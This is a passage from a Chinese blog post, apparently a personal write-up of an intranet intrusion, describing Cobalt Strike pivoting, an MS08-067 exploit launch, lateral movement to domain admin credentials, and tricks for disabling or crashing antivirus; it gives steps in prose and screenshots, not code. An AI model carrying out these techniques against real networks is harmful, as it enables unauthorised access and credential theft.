data-copyright="0" data-ratio="0.3333333333333333" data-s="300,640" style="" data-type="png" data-w="615" src="https://wechat2rss.xlab.app/img-proxy/?k=98d2e11c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyqAkV4JG2qvo9TgZuo3UblMyiaVJYOyT3cTtDg1DBz5JBiajolaUZ8AEQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">因为listener的使用不同，pivot graph界面（就是那个三个点的界面）也会给予不同的展示方式，smb方式的通信是橙色的箭头。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.22649888971132495" data-s="300,640" style="" data-type="png" data-w="1351" src="https://wechat2rss.xlab.app/img-proxy/?k=88c95185&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyzwtficXQpAmZjX2KicDfdLJN8d2WQSkx5ocCnjTrpR8blQA0yicx4Bqcw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">到这里，最初的目的基本已经达到了，拿到域控之后再抓凭证那可就多啦，为所欲为。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.31478770131771594" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=301e27df&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyQPqRJgz4p9uU0UbzHma9xWbVzFpTRpZYpoJibsDbWxrroXjetzAgVzg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">附上一张当时刚拿下时拿着到处装逼的图。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5446906035141329" data-s="300,640" style="" data-type="png" data-w="1309" src="https://wechat2rss.xlab.app/img-proxy/?k=f35bb931&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy2I1GsWu6KTQsMP6ghjjt6hDQFd1SSWBnz5vfqdSQZ6G0n99UyNYialw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><strong><span style="font-size: 20px;color: rgb(0, 122, 170);">• 0X04 额外的点</span></strong></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">1、文章演示操作流程：跳板机→使用cs3.8横向扩张在第三台机器拿到域管凭证→完成实际操作流程：跳板机→使用cs2.5借助ms08067模块拿下一台主机，发现不好使→换成cs3.8横向扩张试了忘了多少反正很多台才拿到域管凭证→完成<br/><strong>当常规域渗透思路走不通时，就要尝试内网渗透当中的手法。</strong></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">2、一开始内网机器都是装了赛门铁克的，ms08067的时候似乎是拦了一下，其他地方没感觉到阻碍，也可以手动关掉防护。有些关不掉的防护程序可以尝试先从服务里禁用掉它们的启动服务。此外还有个小小经验（不保证每次都好用），就是在一些03上面疯狂反复的点击和操作杀软，存在一定几率把他们整的崩掉自己无响应结束进程。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.2890855457227139" data-s="300,640" style="" data-type="png" data-w="339" src="https://wechat2rss.xlab.app/img-proxy/?k=c2e6db59&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyG71zwCkQRG3sMMHpI9O753vFyznccicjEicYwjryp1JXqWUdTYQH5PLg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">3、至于为什么封面图用EZ，因为我觉得这个小黄毛比他的那个帅多了。<br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4、cs2.5 的arpscan除了mac地址可以出详细的机器厂家型号等，发现的与跳板机相连系的机器也会列在pivot graph图形界面上（下图是我拿自己电脑演示的）。记得当时的内网使用cs2.5扫完还发现不少天朝出口的机器（下下图）。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.5329428989751098" data-s="300,640" style="" data-type="png" data-w="1366" src="https://wechat2rss.xlab.app/img-proxy/?k=b8e27871&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyz26CZibsK2icebI6IfTgiaRbRVHj3ibMMCygKceyTmNdvicyUhOydRSJEhQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.8404423380726699" data-s="300,640" style="" data-type="png" data-w="633" src="https://wechat2rss.xlab.app/img-proxy/?k=5ceee035&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy40MIeZLEshJYb0a85ibuawN389KiamRYUPVHIPmIiab99u78GR9bwjtTg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">4、另附我一开始使用cs2.5 借助ms08067拿到172.16.3.1的过程。<br/>（此处演示使用的是cs2.5，生成payload和添加listener的流程都是一样的。不过2.5的安装过程贼麻烦，java版本要适配，想使用最新模块的话msf的安装方式还要同它契合，另外动不动还会嫌弃你的服务器内存不够。）</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6370967741935484" data-s="300,640" style="" data-type="png" data-w="744" src="https://wechat2rss.xlab.app/img-proxy/?k=02caf6a5&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyibnKeydjg44PEjBUpicaKtKnYQUZGXRDnYM3zicUVtMASibF8XJicnwA4Mg%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">因为目标机器在内网，选择对应的内网段，创建一条路由规则。这个过程和msf当中run autoroute -s 的操作是一样一样的。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.7672131147540984" data-s="300,640" style="" data-type="png" data-w="305" src="https://wechat2rss.xlab.app/img-proxy/?k=c108d7f0&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy7pDja72DTia8iaFDh3r0wPC4Q1fcNtOkBowTGVrbwBNklPzHw0EULgPw%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">在这里输入需要的payload名称开头，它会自动搜索。Msf版本够新的话，模块都是有的。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="2.074074074074074" data-s="300,640" style="" data-type="png" data-w="189" src="https://wechat2rss.xlab.app/img-proxy/?k=656c9bd1&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy1jfLvsp8MVOib0qkXX10jtNk16JzY7icDtNTdk5vsnwJ9CXpQHheSJaQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="2.0952380952380953" data-s="300,640" style="" data-type="png" data-w="189" src="https://wechat2rss.xlab.app/img-proxy/?k=9bdeea4f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMyezt8C0q5sAABF5nfheO9Xqh85qFiaJ0BqvQvsffIMFCZFCb9PGf3fTA%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">双击ms08067的模块进入设置页面，图形化设置msf的参数，点击launch攻击成功的话会话就弹回来了。</span></p><p style="margin: 0px 0px 1.2em !important;"><img class="" data-copyright="0" data-ratio="0.6111111111111112" data-s="300,640" style="" data-type="png" data-w="576" src="https://wechat2rss.xlab.app/img-proxy/?k=34e1fff4&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F4iacC3bS3Zh0K3ORrg9lvRf7pVdBicdnMy8lUqkibmTav1bZF53PFIru4XAiaTl4NO7ibrOYzYbbsQFP5w9FuQf6RtQ%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin: 0px 0px 1.2em !important;"><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"><strong>大概就是上面这些了，文笔垃圾，措辞轻浮，内容浅显，操作生疏。不足之处欢迎大师傅们指点和纠正，感激不尽</strong>。</span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);">参考文章：</span><span style="font-size: 15px;color: rgb(73, 68, 68);"> https://klionsec.github.io/2017/12/28/cobalt-strike-spawn/</span><span style="font-size: 15px;color: rgb(73, 68, 68);">  <br/></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><hr/><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;color: rgb(73, 68, 68);"></span></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"></span></p><p><img class="" data-copyright="0" data-ratio="0.5626373626373626" style="" data-type="gif" data-w="910" src="https://wechat2rss.xlab.app/img-proxy/?k=0e75b4cd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2F4iacC3bS3Zh3d0c3xAGybIzA4vB7QqiamDQxB3KTjr5mPQKETKUb1DX8eYw3QD17BSEkewKT3zp1qmpzOSXWyibyA%2F640%3Fwx_fmt%3Dgif"/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;"></span><br/></p><p style="margin: 0px 0px 1.2em !important;"><span style="font-size: 15px;">*封面图片自Google图片采集，版权归英雄联盟所有。其他图片均为原创。<br/></span></p><p><span style="font-size: 15px;">*转载请联系本人微信， WeChat id： <strong>wojiao123dadaguai   </strong></span></p><p style="margin: 0px 0px 1.2em !important;"><br/></p>




]]></content:encoded>
      <pubDate>Wed, 07 Feb 2018 18:39:33 +0800</pubDate>
    </item>
  </channel>
</rss>